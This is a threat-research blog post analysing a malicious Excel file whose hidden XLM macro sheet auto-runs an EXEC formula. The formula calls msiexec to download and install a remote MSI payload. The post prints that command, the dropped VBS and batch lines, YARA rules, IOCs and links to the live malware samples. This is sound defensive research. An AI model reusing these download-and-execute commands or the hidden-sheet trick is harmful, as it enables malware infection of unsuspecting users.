Blog

Extracting "Sneaky" Excel XLM Macros

In this article, we present our in-depth analysis of a malicious Microsoft Excel document (.xlm format) that we found in the wild. We show how existing open source tools can be utilized to carve out interesting artifacts. During our analysis, we also point out some tool limitations and present our solution to closing the gap. Ultimately, our goal is to orchestrate the carving of as many artifacts as possible, for robust threat detection and prevention.

The sample we’ll dive into originally popped up on our RADAR a few weeks ago, just around the new year. Received through one of our VirusTotal Intelligence YARA hunt rules that search for suspicious Microsoft Office documents. The initial sample and some relevant reports:

  • SHA256: 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
  • Multi-AV: VirusTotal
  • Sandbox detonation: Hybrid-Analysis
  • Downloadable Samples

Initial AV detection was rather low (3/59), we’ll see why when we dive into the analysis. As of the time of this blogs publish, 30 days have passed and the file has been rescanned 6 times, resulting in a total of 9 out of 59 engines successfully detecting the threat.

A Cursory Glance

First, we open the XLS file with Microsoft Excel in a virtual environment to see what it looks like to an end-user. This Excel file contains a single spreadsheet, and the spreadsheet contains a single image that instructs the reader to click “Enable content” in order to view/edit the document (Fig 1); this is a common social engineering attempt to entice the user into allowing execution of the first stage of the malware payload:

Enticing users to activate the first stage of the malware
Fig 1. Enticing users to activate the first stage of the malware. We detect this and similar lures through Optical Character Recognition (OCR).

Note that the social engineering component alone of this document lure is enough to trigger InQuest threat prevention. In this particular case through the Optical Character Recognition (OCR) layer of our Deep File Inspection® (DFI) stack.

Let’s use the popular oledump and olevba Python scripts, to examine whether the XLS file contains any VBA macros:

$ olevba3 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:-------- 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
===============================================================================
FILE: 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
Type: OLE
No VBA macros found.

$ oledump.py 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
  1:      4096 'x05DocumentSummaryInformation'
  2:      4096 'x05SummaryInformation'
  3:    173064 'Workbook'

According to both tools, the document seemingly doesn’t contain any VBA macros. Note that oledump can leverage an additional plugin to dive deeper into the file, more on this later. To further investigate the file, we’ll employ the help of a Windows GUI tool for Structure Storage View SSView and a hex editor, in this case Hexinator.

A Deeper Dive

XLS is a Compound Document File (CDF or CF) or Object Linking and Embedding (OLE) File; thus, it can be explored with any OLE/CF viewer such as SSView. OLE files are hierarchical data structures consisting of several storages and streams, analogous to folders and files on your standard file system. Fig 2 shows the structure of this particular XLS file in SSView. In this file, the Workbook stream is interesting as it contains all the information related to this workbook such as the included sheets. The structure of this stream is fully specified in Microsoft Office Excel 97-2007 – Binary File Format Specification. We dump the Workbook stream to the filesystem by right-clicking on its name and then selecting “Save stream …”.

Using SSView to explore the XLS files storages and streams
Fig 2. Using SSView to explore the XLS files storages and streams.

Note that we can also use 7zip to extract all storages and streams from an OLE compound file. 7zip creates a folder and a file for each relevant storage and stream parsed out of the compound file. We pull the extracted Workbook stream into our hex editor, and can spot a cmd.exe pivot at offset 0x028ABB as depicted in Fig 3.

Spotting the embedded cmd.exe pivot in the extracted Workbook stream
Fig 3. Spotting the embedded cmd.exe pivot in the extracted Workbook stream.

Why the pivot through msiexec.exe? It’s one of a myriad of “Living off the Land” (LOL) techniques that attackers employ to mask their activitiy from runtime endpoint security monitoring tools. For a well maintained list of LOL binaries and libraries, see the LOLBAS project… they have a section dedicated to msiexec. The serf=19 bit is interesting, see the relevant documentation in the MSDN article for Custom Action Type 19. This makes for a good hunt rule on its own. We’re looking for serf=19 specifically, or any other serf= and an URL prefix of http:

// see: https://github.com/InQuest/yara-rules/
rule MSIExec_Pivot
{
    strings:
        $serf19   = "serf=19" nocase ascii wide
        $msiserf1 = "msiexec" nocase ascii wide
        $msiserf2 = "serf="   nocase ascii wide
        $msiserf3 = "http"    nocase ascii wide
    condition:
        $serf19 or all of ($msiserf*)
}

Before shifting focus to the actual MSI file that the msiexec pivots to, let’s take a brief look at the domain office365advance[.]com. It was only registered recently, a few days before the sample in question was first seen on Virus Total. The resolving IP address geo locates to Russian and appears to host another domain as well:

DomainIPRegistration DateLocation
office365advance[.]com185.68.93.8412/26/2018Russia
krontvhouse[.]com185.68.93.842014Russia

Further pivots can be made to uncover other related infrastructure, we leave this as an exercise for the reader and instead next examine the MSI installer which is retrieved from this domain. The MSI file has a SHA256 hash of a5bc8c8b89177f961aa5c0413716cb94b753efbea1a1ec9061be53b1be5cd36a and was initially uploaded to Virus Total on the same day that office365advance[.com] was registered. Initial detection was a meager 2 detection… today, 36 AV vendors properly detect this file as malicious. A simple string analysis on the MSI reveals the URL www.exetomsi.com, which contains a free tool to convert executable files (.exe) to an MSI installer. Turns out, this is a valuable hunting rule as well, we’ve been watching the results for a while and there’s plenty of other malware authors converting their payloads to MSI using this tool:

// see: https://github.com/InQuest/yara-rules/
rule Executable_Converted_to_MSI
{
    strings:
        $magic = /^xD0xCFx11xE0xA1xB1x1AxE1x00x00x00/
        $url   = "www.exetomsi.com" nocase
    condition:
        $magic at 0 and $url
}

Obviously, this string is easily bleached and thus this signature is easily evaded. Finer selected heuristics will provide a more robust hunt rule, again left as an exercise for the reader.

The MSI file in turn contains a malicious binary (c354467ec5d323fecf94d33bc05eab65f90a916c39137d2b751b0e637ca5a3e4). Upon its execution, it drops a VBS script (rds.vb, 8a5041d41c552c5df95e4a18de4c343e5ac54845e275262e99a3a6e1a639f5d4), a Batch file (help.bat, 91237a76e43caa35e3fbd42d47fbaca5d6b5ea7a96c89341196d070b628122ce), and Windows DLL library (htpd.dat, 79a56ca8a7fdeed1f09466af66c24ddef5ef97ac026297f4ea32db6e01a81190). The VBS script simply executes the dropped help.bat file via a WScript.Shell pivot:

# RDS.VB
CreateObject("WScript.shell").run "cmd /c %temp%help.bat", 0, False

The executed batch file in turn pivots to the dropped DLL by way of rundll32.exe. Note the entry point of the DLL here is bogus():

# HELP.BAT
rundll32.exe C:UsersZGSPBU~1AppDataLocalTemphtpd.dat, bogus

The DLL was also uploaded to Virus Total on 12/26/18, the date of the domain registration. Initial detection was at 4, whereas today, the majority of AV engines (46) successfully detect the DLL as malicious. Unfortunately this is the end of the line for our investigation. As of the time of research, htpd.dat:bogus() attempts to retrieve a next-stage payload from one unreachable and another unregistered server. We’ve made public a Joe Sandbox Detonation Report for your perusal.

Within that report we can see two possible domains for next-stage retrieval:

URLStatus
hxxps://vesecase[.]com/support/form.phpOffline
hxxps://afsssdrfrm[.]pw/support/form.phpUnregistered

Peering back into the history of the registered, but currently offline domain, we can see that as of 12/20/2018 vesecase[.]com was hosting a default Apache Ubuntu install page:

Macroless Command Execution?

What of the original pivot though? How does the Excel malware lure transition from the user’s enabling of active content, to the cmd.exe / msiexec combination? It turns out the active content resides within an XLM macro, an age old technology that is giving AV some grief as of late. These kinds of techniques appear from time to time. Collating documents through capture (data-in-motion) and aggregation (data-at-rest) into the InQuest platform empowered by Deep File Inspection (DFI) provides threat hunting teams with an analysis tool to discover previously undiscovered and targeted threats… just like this.

To discover the answer, we’ll take an ever deeper look at the Workbook stream, which is in the BIFF8 format. First, we’ll take an interactive look with the Windows tool BIFFView++. As it is depicted in figures 4 and 5, the msiexec command is found within a Cell Formula (6h) record. That record is contained within the very first cell of the spreadsheet, A1 (column ‘A’, row ‘1’).

Determining the type of record that encompasses the malicious msiexec command
Fig 4. Determining the type of record that encompasses the malicious msiexec command.
Structure of a Cell Formula (6h) record (ref 1)
Fig 5. Structure of a Cell Formula (6h) record (ref 1)

Now, we need to determine the sheet that contains this particular cell formula. According to the XLM Spec, all information about a sheet such as its name, type, and stream position are kept within a BOUNDSHEET record (85h). In Fig 6. we can see that this workbook has two BOUNDSHEET records; which means it has two sheets. However, one of them must be hidden as we can only see one sheet in Fig 1.

BOUNDSHEET records in this Workbook; representing two sheets.
Fig 6. BOUNDSHEET records in this Workbook; representing two sheets.
Option flags in BOUNDSHEET record
Fig 7. Option flags in BOUNDSHEET record (this field starts at offset 8 and is two bytes; marked as green and blue in Fig 6)

The first sheet starts at offset 0x028938 and the second one at offset 0x028C17. The cell formula that we are interested in is located at 0x028ABB; this means that this cell is in the first sheet; which is a hidden macro sheet. We can unhide the sheet by either setting the hidden state to zero within the file, or toggling the setting through the Excel interface. It is interesting to note that the hidden state can also be set to 2; which is called very hidden state. Very hidden sheets cannot be unhidden through the Excel interface, they can only be toggled to visible via manual hex editing of the file. After unhiding the macro sheet, we can see the embedded macro clearly in the Excel GUI.

Macro sheet containing malicious Cell Formula pivot.
Fig 8. Macro sheet containing malicious Cell Formula pivot.

This formula is triggered when the document is opened (Auto_Open label points to cell A1), the user is asked to enable active content, and then the cmd.exe/msiexec and subsequent chain of events are automatically executed. As mentioned earlier, XLM 4.0 macros are an arcane technology that predate VBA even (which was introduced in Excel 5.0).

We’re afforded yet another hunting opportunity here. The following YARA rule will detect Excel files with both hidden and very hidden macro sheets. Please note that not all XLM files with hidden Macro sheets are malicious.

// see: https://github.com/InQuest/yara-rules/
rule Excel_Hidden_Macro_Sheet
{
        strings:
                $ole_marker     = {D0 CF 11 E0 A1 B1 1A E1}
                $macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
                $macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
        condition:
                $ole_marker at 0 and 1 of ($macro_sheet_h*)

}

To programmatically extract XLM macros from an Excel Workbook, we can lean on the BIFF plugin that is bundled with @DidierStevens oledump tool. This plugin recognizes a number of functions such as EXEC, REGISTER, and HALT. First, let’s explore the BIFF objects by count:

# BIFF dump, sorted by record type popularity, with partial annotations.
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526  | tr -s ' '  | cut -d' ' -f4 | sort | uniq -c | sort -nr
     63 XF   # Extended Format 5.115
     47 STYLEEXT
     47 STYLE
     42 ROW
     41 XFEXT
     40 MULBLANK
     20 FORMAT
     17 CONTINUE  # record code=3C00XXXX (typically 3C002020 for record size)
      3 EOF
      3 DBCELL
      3 BOF
      2 WSBOOL
      2 WINDOW2
      2 VCENTER
      2 TOPMARGIN
      2 SETUP
      2 SELECTION
      2 SAVERECALC
      2 RIGHTMARGIN
      2 REFMODE
      2 PRINTHEADERS
      2 PRINTGRIDLINES
      2 PLV
      2 MSODRAWINGGROUP    # code=eb002020 this is where your images are.
      2 MSODRAWING         # related
      2 LEFTMARGIN
      2 ITERATION
      2 INDEX
      2 HEADERFOOTER
      2 HEADER
      2 HCENTER
      2 GUTS
      2 GRIDSET
      2 FORMULA           # EXEC, HALT, etc. the macro content
      2 FOOTER
      2 FEATHEADR
      2 DIMENSIONS
      2 DELTA
      2 DEFCOLWIDTH
      2 DEFAULTROWHEIGHT
      2 COLINFO
      2 CALCMODE
      2 CALCCOUNT
      2 BOUNDSHEET        # Spreadsheets
      2 BOTTOMMARGIN
      1 plugin
      1 XFCRC
      1 WRITEACCESS
      1 WINDOWPROTECT
      1 WINDOW1
      1 USESELFS
      1 THEME
      1 TABLESTYLES
      1 TABID
      1 SUPBOOK
      1 SST
      1 REFRESHALL
      1 RECALCID
      1 PROTECT
      1 PROT4REVPASS
      1 PROT4REV
      1 PRECISION
      1 PLS
      1 PASSWORD
      1 OBJ
      1 MTRSETTINGS
      1 MMS
      1 MERGECELLS
      1 LABEL            # This record represents a cell that contains a string.
      1 INTERFACEHDR
      1 INTERFACEEND
      1 HIDEOBJ
      1 HFPicture
      1 FORCEFULLCALCULATION
      1 FNGROUPCOUNT
      1 EXTSST
      1 EXTERNSHEET
      1 EXCEL9FILE
      1 DSF
      1 COUNTRY
      1 COMPRESSPICTURES
      1 COMPAT12
      1 CODEPAGE
      1 BOOKEXT
      1 BOOKBOOL
      1 BACKUP
      1 1904

If you’re looking for “interesting” records, start with grepping for the “sheet”, “label”, and “formula”. Let’s look for the Auto_Open label and dump it, to find the cmd/msiexec combination:

$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-o label -s"
  1:      4096 'x05DocumentSummaryInformation'
  2:      4096 'x05SummaryInformation'
  3:    173064 'Workbook'
               Plugin: BIFF plugin
                 '0018     31 LABEL : Cell Value, String Constant - x00Auto_Ope'
                  ASCII:
                   Auto_Open:
                 002a      2 PRINTHEADERS : Print Row/Column Labels
                 002a      2 PRINTHEADERS : Print Row/Column Labels

$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-o formula"
  1:      4096 'x05DocumentSummaryInformation'
  2:      4096 'x05SummaryInformation'
  3:    173064 'Workbook'
               Plugin: BIFF plugin
                 0160      2 USESELFS : Natural Language Formulas Flag
                 '0006    129 FORMULA : Cell Formula - R1C1 107 ptgStr "msiexec.exe serf=19 skip=1 /i http://office365advance.com/update /q OnStart='c:\windows\notepad.exe'" ptgFuncVarV args 1 func 006e (EXEC) '
                 0006     26 FORMULA : Cell Formula - R2C1 4 ptgFuncVarV args 0 func 0036 (HALT)

Next, let’s take a look at how one could programmatically carve the image component out of the document lure.

Carving Images from XLM

As mentioned in the beginning, our aim is to carve as much as possible from this file. Thus, we are also interested in extracting the image embedded in this document. This is a precursor to extracting the semantic meaning through Optical Character Recognition (OCR). Common choices to accomplish this task generically include forensic tools such as foremost and scalpel. We’ll show an example of using scalpel here. However, neither provides a copy with the same fidelity as what is originally displayed upon opening the Excel document in a virtual machine:

# applicable scalpel rules:
#    GIF and JPG files (very common)
#        gif     y       5000000         x47x49x46x38x37x61        x00x3b
#        gif     y       5000000         x47x49x46x38x39x61        x00x00x3b
#        jpg     y       200000000       xffxd8xffxe0x00x10        xffxd9
#        jpg     y       200000000       xffxd8xffxe1                xffxd9

$ scalpel -c /etc/scalpel.conf 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526/workbook

Fig. 9 shows the output of the carved file by scalpel in the default image viewer on Windows 10.

Corrupted JPEG file extracted from the XLM file by scalpel
Fig. 9: Corrupted JPEG file extracted from the XLM file by scalpel.

Why is the file corrupted? Within the XLS/BIFFv8 format, records have a maximum size of 8,228 bytes. If the size of data is greater than what can fit in a single record, then the data must be split into chunks. The first chuck is put in the first record, and the rest of data chunks are placed in subsequent CONTINUE (3Ch) records. To successfully extract images from XLM files, one needs to strip these CONTINUE headers from the extracted image. To accomplish this task automatically, we’ve extended the oledump BIFF plugin (plugin_biff.py) to include a new command line switch for extracting images. You can find our patch in our Github repository (lines 570 to 603):

https://github.com/InQuest/DidierStevensSuite/blob/BIFF-Image-Dump-Switch/plugin_biff.py#L570-L592

Here it is in action:

$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-h"
Usage: oledump.py [options]

Options:
  -h, --help            show this help message and exit
  -e, --extract         Extract images
  -s, --strings         Dump strings
  -a, --hexascii        Dump hex ascii
  -o OPCODE, --opcode=OPCODE
                        Opcode to filter for
  -f FIND, --find=FIND  Content to search for

$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-e"
  1:      4096 'x05DocumentSummaryInformation'
  2:      4096 'x05SummaryInformation'
  3:    173064 'Workbook'
               Plugin: BIFF plugin
                 00003255 0866    126 HFPicture : Header / Footer Picture
                 00005279 00eb   8224 MSODRAWINGGROUP : Microsoft Office Drawing Group
                            [EB] image + 8107 = 8107 bytes
                 0000729d 00eb   8224 MSODRAWINGGROUP : Microsoft Office Drawing Group
                            [EB] image + 8224 = 16331 bytes
                 000092c1 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 24555 bytes
                 0000b2e5 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 32779 bytes
                 0000d309 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 41003 bytes
                 0000f32d 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 49227 bytes
                 00011351 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 57451 bytes
                 00013375 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 65675 bytes
                 00015399 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 73899 bytes
                 000173bd 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 82123 bytes
                 000193e1 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 90347 bytes
                 0001b405 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 98571 bytes
                 0001d429 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 106795 bytes
                 0001f44d 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 115019 bytes
                 00021471 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 123243 bytes
                 00023495 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 131467 bytes
                 000254b9 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 139691 bytes
                 000274dd 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 147915 bytes
                 00027c6f 003c   1934 CONTINUE : Continues Long Records
                            [3C] image + 1934 = 149849 bytes

Conclusion

In this article, we analyzed a stealthy malicious Excel document that relies on XLM macros to run embedded commands; which is an old-age technology superseded by VBA. We provided in detail on how such macros can be located in XLM binary files and also how to carve other useful information such as image files. Last not least, we also presented three YARA rules that can be used to capture malware instances that use similar technique.

If you’re interested in a similar sample, take a look at:

  • VT: 6f807662e04b5cfb85bc892e27a29994ddcf78e7c3311581753761fede3d5bd1
  • Pivot: add3565office[.]com/rstr
  • Final: pointsoft[.]pw

Malware Samples (All Stages)

Note: The following contain links to actual malware. Though without file extensions, care should be taken. Not everyone has access to Virus Total, and we want to ensure that samples are available freely for all researchers to improve their trade craft.

StageParent ProcessFile TypeNameSHA256…Download
1EXCELXLS98e4695e…download
2MSIEXECMSIa5bc8c8b…download
3MSIEXECEXEc354467e…download
4WSCRIPTVBSrds.vbs8a5041d4…download
5CMDBAThelp.bat91237a76…download
6RUNDLL32DLLhtpd.dat79a56ca8…download

YARA Hunting Rules

The YARA rules we defined inline above are available, along with other YARA rules we wish to share with the community. These rules should not be considered production appropriate. Rather, they are valuable for research and hunting purposes:

Other YARA rules that we’ve open-sourced can be found at https://github.com/InQuest/yara-rules/. Additionally, we maintain a curated list of awesome YARA rules, tools, and people over at: https://github.com/InQuest/awesome-yara/.

References

IOCs

  • 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
  • a5bc8c8b89177f961aa5c0413716cb94b753efbea1a1ec9061be53b1be5cd36a
  • c354467ec5d323fecf94d33bc05eab65f90a916c39137d2b751b0e637ca5a3e4
  • 8a5041d41c552c5df95e4a18de4c343e5ac54845e275262e99a3a6e1a639f5d4
  • 91237a76e43caa35e3fbd42d47fbaca5d6b5ea7a96c89341196d070b628122ce
  • 79a56ca8a7fdeed1f09466af66c24ddef5ef97ac026297f4ea32db6e01a81190
  • office365advance[.]com
  • hxxp://office365advance[.]com/update
  • krontvhouse[.]com
  • 185.68.93.84
  • vesecase[.]com
  • hxxps://vesecase[.]com/support/form.php
  • afsssdrfrm[.]pw
  • hxxps://afsssdrfrm[.]pw/support/form.php
  • add3565office[.]com
  • add3565office[.]com/rstr
  • pointsoft[.]pw

Free On-Demand Webinar: Think Before You Click

Whether sent as an email attachment, sitting in your cloud or traversing the Web, file-borne threats have become a proven favorite for delivering malware and phishing campaigns. View our webinar on-demand and get firsthand tips about how to safeguard your cybersecurity stack with File Detection and Response (FDR) and stop file-borne threats in their tracks.

View the Webinar On-Demand